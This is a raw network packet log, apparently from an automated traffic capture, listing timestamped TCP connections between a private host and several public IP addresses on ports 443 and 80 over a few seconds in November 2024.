                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:45.975747108 CET4434987623.96.180.189192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:45.976051092 CET49876443192.168.2.523.96.180.189
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:45.976123095 CET4434987623.96.180.189192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:45.976185083 CET49876443192.168.2.523.96.180.189
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.018820047 CET49876443192.168.2.523.96.180.189
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.018846035 CET4434987623.96.180.189192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.023458958 CET4434987213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.023610115 CET4434987213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.023686886 CET49872443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.023797035 CET49872443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.023833990 CET4434987213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.023884058 CET49872443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.023900032 CET4434987213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.026819944 CET49882443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.026848078 CET4434988213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.026987076 CET49882443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.027158976 CET49882443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.027170897 CET4434988213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.035126925 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.057121992 CET4434987113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.057148933 CET4434987113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.057208061 CET49871443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.057224035 CET4434987113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.058528900 CET49871443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.058609962 CET4434987113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.058681011 CET49871443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.130485058 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.131005049 CET49877443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.131072998 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.131690979 CET49877443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.131711006 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.131774902 CET49877443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.131791115 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.196969986 CET4434987413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.197052002 CET4434987413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.197123051 CET49874443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.197927952 CET49874443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.197959900 CET4434987413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.197985888 CET49874443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.197999954 CET4434987413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.201672077 CET49883443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.201694965 CET4434988313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.201807022 CET49883443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.202013016 CET49883443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.202027082 CET4434988313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.222235918 CET4434987313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.222409010 CET4434987313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.222841024 CET49873443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.222841024 CET49873443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.222899914 CET49873443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.222930908 CET4434987313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.225055933 CET49884443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.225085020 CET4434988413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.225143909 CET49884443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.225281954 CET49884443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.225291967 CET4434988413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.272983074 CET4434987513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.273066998 CET4434987513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.273156881 CET49875443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.273416996 CET49875443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.273447037 CET4434987513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.273473978 CET49875443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.273488045 CET4434987513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.275970936 CET49885443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.276031971 CET4434988513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.276117086 CET49885443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.276242971 CET49885443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.276273012 CET4434988513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.375386000 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.375478029 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.375583887 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.375727892 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.376029968 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.376147985 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.376183033 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.376249075 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.376640081 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.376775026 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.376965046 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.377027035 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.378005028 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.378082991 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.378115892 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.379021883 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.379079103 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.379357100 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.380198956 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.380302906 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.380332947 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.380400896 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.381381989 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.381431103 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.381511927 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.381582975 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.382585049 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.382637024 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.382688999 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.383625031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.383714914 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.383786917 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.383965969 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.384697914 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.384757042 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.384835958 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.384911060 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.385972977 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.386028051 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.386104107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.386219025 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.387196064 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.387334108 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.387362957 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.387430906 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.388230085 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.388309002 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.388385057 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.388433933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.389415026 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.389450073 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.389487982 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.389487982 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.390492916 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.390647888 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.390712023 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.390759945 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.391765118 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.391830921 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.391907930 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.392184019 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.392822027 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.392966032 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.392982006 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.393136024 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.393925905 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.394098043 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.394180059 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.394232035 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.395121098 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.395194054 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.395267010 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.395311117 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.396298885 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.396332026 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.396369934 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.396369934 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.397358894 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.397553921 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.397614956 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.398613930 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.398647070 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.398703098 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.399625063 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.399663925 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.399677992 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.399698973 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.399734020 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.399760008 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.399784088 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.402237892 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.402335882 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.402384996 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.402456999 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.403256893 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.403409004 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.403546095 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.404182911 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.404331923 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.404413939 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.405421972 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.405459881 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.405539989 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.406486988 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.406569958 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.406630993 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.406708002 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.407715082 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.407777071 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.407845020 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.408466101 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.408936024 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.408971071 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.409041882 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.409041882 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.409986019 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.410135031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.410183907 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.410183907 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.411174059 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.411354065 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.411365986 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.411428928 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.412265062 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.412348032 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.519853115 CET4434987623.96.180.189192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.519869089 CET4434987623.96.180.189192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.519942999 CET49876443192.168.2.523.96.180.189
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.519973993 CET4434987623.96.180.189192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.519998074 CET4434987623.96.180.189192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.520057917 CET49876443192.168.2.523.96.180.189
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.520978928 CET49876443192.168.2.523.96.180.189
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:46.521004915 CET4434987623.96.180.189192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.026792049 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.027086973 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.027100086 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.027570009 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.027962923 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.028038025 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.028062105 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.069802046 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.069823980 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.115873098 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.119231939 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.119271994 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.119807005 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.121886015 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.121992111 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.122014046 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.122055054 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.122318029 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.122339010 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.123395920 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.123455048 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.123822927 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.123893023 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.124059916 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.124068022 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.135620117 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.135812998 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.163345098 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.177120924 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.177146912 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.250679970 CET4434987813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.257059097 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.257087946 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.263833046 CET49878443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.263865948 CET4434987813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.264384985 CET49878443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.264393091 CET4434987813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.302865028 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.302894115 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.302961111 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.302968979 CET49877443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.303002119 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.303033113 CET49877443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.303082943 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.303271055 CET49877443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.303498983 CET49877443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.303498983 CET49877443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.303527117 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.303548098 CET4434987740.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.439975977 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.440071106 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.440177917 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.441099882 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.441138983 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.515295029 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.515335083 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.515343904 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.515361071 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.515392065 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.515404940 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.515414000 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.515438080 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.515470982 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.639900923 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.639942884 CET4434988720.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.640008926 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.640400887 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.640428066 CET4434988720.189.173.9192.168.2.5
